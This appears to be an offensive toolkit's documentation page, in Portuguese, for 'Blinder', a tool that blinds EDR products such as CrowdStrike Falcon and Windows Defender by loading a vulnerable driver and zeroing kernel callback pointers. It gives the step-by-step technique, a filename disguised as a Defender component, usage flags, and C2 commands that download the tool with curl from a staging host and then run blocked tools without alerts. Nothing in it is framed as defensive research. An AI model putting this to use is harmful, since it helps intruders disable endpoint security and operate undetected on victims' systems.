Blinder

Silenciador de EDR via remocao de callbacks do kernel

Voltar

100% Efetivo contra CrowdStrike Falcon

Remove 70+ callbacks do kernel. Permite execucao de ferramentas bloqueadas sem alertas.

O que e

Ferramenta que cega EDRs removendo seus callbacks no kernel. Em vez de matar processos (o que gera alerta), zera os ponteiros de callback - o EDR continua rodando mas perde a visibilidade.

Tecnica: BYOVD (Bring Your Own Vulnerable Driver)
Privilegio: Administrator
Persistencia: Nenhuma - precisa rodar apos cada reboot

Como Funciona

  1. Carrega driver vulneravel (WinCollectorPilot.sys)
  2. Mapeia memoria fisica via IOCTLs do driver
  3. Page Walk para encontrar CR3 do kernel
  4. Localiza arrays de callbacks usando offsets por build
  5. Zera ponteiros que apontam para modulos de EDR
  6. Cleanup automatico do driver

Callbacks Removidos

TipoO que monitora
Process CreationCriacao de processos
Thread CreationCriacao de threads
Image LoadCarregamento de DLLs/EXEs
Object (Process/Thread)Handles de processo e thread
MinifilterOperacoes de I/O em arquivos

Uso

Comandos

ComandoDescricao
WdFilter.exe -lLista callbacks ativos
WdFilter.exe -dRemove callbacks de EDR

Via C2

run curl -o WdFilter.exe http://STAGING/WdFilter.exe
run WdFilter.exe -d
run cmd /c "ferramenta.exe parametros"

Resultados

EDRStatusCallbacks Removidos
CrowdStrike FalconFunciona70+
Windows DefenderFuncionaVariavel

Metricas (CrowdStrike)

Tempo de execucao

~15 segundos

Taxa de sucesso

100%

Alertas gerados

Nenhum

Crash/BSOD

Nenhum

Limitacoes

Nao persiste! Apos reboot, callbacks voltam. Precisa executar novamente.